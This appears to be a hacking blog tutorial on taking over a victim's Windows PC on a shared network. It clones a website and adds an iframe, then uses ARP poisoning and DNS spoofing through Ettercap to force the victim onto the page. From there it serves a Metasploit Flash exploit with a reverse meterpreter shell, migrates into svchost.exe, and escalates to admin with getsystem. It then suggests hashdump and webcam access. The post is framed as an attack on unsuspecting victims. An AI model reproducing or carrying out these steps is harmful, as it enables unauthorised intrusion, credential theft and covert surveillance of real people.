today we’ll hack windows get admin access…
we’ll use here adobe flash player vulnerability exploit of metasploit. It’s easy and working to get steady meterpreter session
Required Hack-Tools for hack windows get admin access :
1. Linux with metasploit
2. adobe flash player exploit module
3.apache server and ettercap for ARP spoofing
First you’ve to be in the network of your victim.. it may be LAN or WLAN
create any website that you’re victim will be using..you can clone the website by using SET Social engineering toolkit.
How to clone website using SET
After getting cloned website you should place it in the location where your apache server root location.
i.e /var/www/html/ at this location.
Edit the HTML file place a iframe in it..
type your local IP address you can get it by typing ifconfig on new terminal(bash).
then save the file to /var/www/html/ location and rename it to index.html
Start Attack :
To start attack you should make your victim to come to your page .
to do that you have to perform DNS Spoofing and ARP poisoning. so open up Ettercap you can open graphical as well as terminal .
after starting ettercap go to new terminal open up file etter.dns
to find that type leafpad /etc/etter/dns/etter.dns
open that file go to DNS edit the file place your IP address into that and use * so that all the requests done by DNS resolver will be re directed to our website which is placed in our apache server.
So you’re ready to go on metasploit
service apache2 start && service postgresql start && msfconsloe
after metasploit started find an exploit named
which was released on 02-02-2015.
search it in msfconsloe
if you don’t get please download the exploit from here.
download the exploit from here., then copy it in the ~/.msf4/modules/exploit/browser directory. Any exploit put here will be detected my Metasploit when it starts.
then rename the file to adobe_flash_worker_byte_array_uaf.rb
after that use that exploit .
to use that on msfconsloe type
the location should be same as the file which you have saved earlier.
then set your reverse tcp windows meterpreter shell
set payload windows/meterpreter/reverse_tcp
in this meterpreter session we’ll migrate the user to any specified program before execuition of exploit.
to do that type
there you’ll find an option setting called PrependMigrate and PrependMigrateProc you’ll find the current settings of that is in False select that copy that you should make it true and there you have to specify the migration program. to do that
set prependmigrate true
set prependmigrateproc svchost.exe
now all 2 are set and migration location also specified
what will happen in this 2 lines is when we get meterpreter session open the exploit will leave the connection which has came from iframe which has done earlier and gets migrated to svchost.exe which is a windows processor it will on running all the time in windows.
then set URI path and LHOST & LPORT
set URIPATH /
set LHOST your_Ip_address
set LPORT 8084
After this done type
now it will listen on the port which you’ve specified in html file iframe and as soon it gets you’ll get meterpreter session of windows.
But you must make the user to come to your site to do that you must ARP poision and DNS spoof them because unless you force the user to come on your location they’ll never come.
to do that
go to terminal type
So now we’ve started with the attack.
start sniffing by pressing unified sniffing over that menu bar and select your interface Wlan0 or Eth0 what you’re in and then go to scan host list get your victims IP address add him to target 2 then add the gateway IP address to target 2 it might be like 192.168.1.1 if you’re victims IP address is 192.168.1.125 like that.
Select menu item MITM select ARP Poisoning. Tick all the 2 options on that
i.e one way poison and sniff remote connection.
Then go to manage plug in there you select dns spoof.
after dns spoof started wait for your victim to come in.
as soon he try to enter any of the sites he/she will be redirected to our web location.
As the connections are made up you’ll get a meterpreter session and the meterpreter session will be migrated to the svchost.exe application running on your victims windows machine as well.
as you can see the meterpreter session 1 opend on your prompt you have to stop or close the ettercap immediately! because our victim will close the browser because all of his requests are poisoned.
as you closed the ettercap he can go to other sites he might close the browser. but we’ve our meterpreter session.
So now type
sessions in meterpreter shell so you can see active sessions.
session -i 1
to select the session and type
ps to see all the services running on our victims PC
now you can see that our session has been compromised to
(i) internet browser
so as you can see we are getting all the connections that are made by the victim but we’re not having administrator previlages to admnister over his system.
hack windows get admin access
To get windows admin access you have to get any other exploits of windows to do that press CTRL+Z on your keyboard now you’ll get a prompt! asking background session hit y to that and you’ll fall back to msfconsloe but your session will be live on background.
get an module named post/multi/recon/local_exploit_suggester
this is a module of the metasploit this requires a session.
to give that type
set session 1
so the session is set then you type
now you’ll get the vulnerable exploits of the system. you can use it one by one.
we will be using this exploit here
this is a stable exploit that is used to get windows admin access.
to use that type
this exploit requires a session and this works on X86 based windows.
to set that type
set session 1 then hit
as you get your second meterpreter session opend you can enjoy administrator access.
getuid to check your administrator access. and hit
getsystem to get all the administrative previlages. now you can watch everything on the computer.
you can open files get hashdump webcam etc..
if you don’t know how to use all just type
help and see all the options.
so now you’ve got all the admin powers.
I hope this tutorial is helpful to understand how to hack windows get admin access. if you’ve any queries comment. keep hacking! keep visiting 🙂 thank you..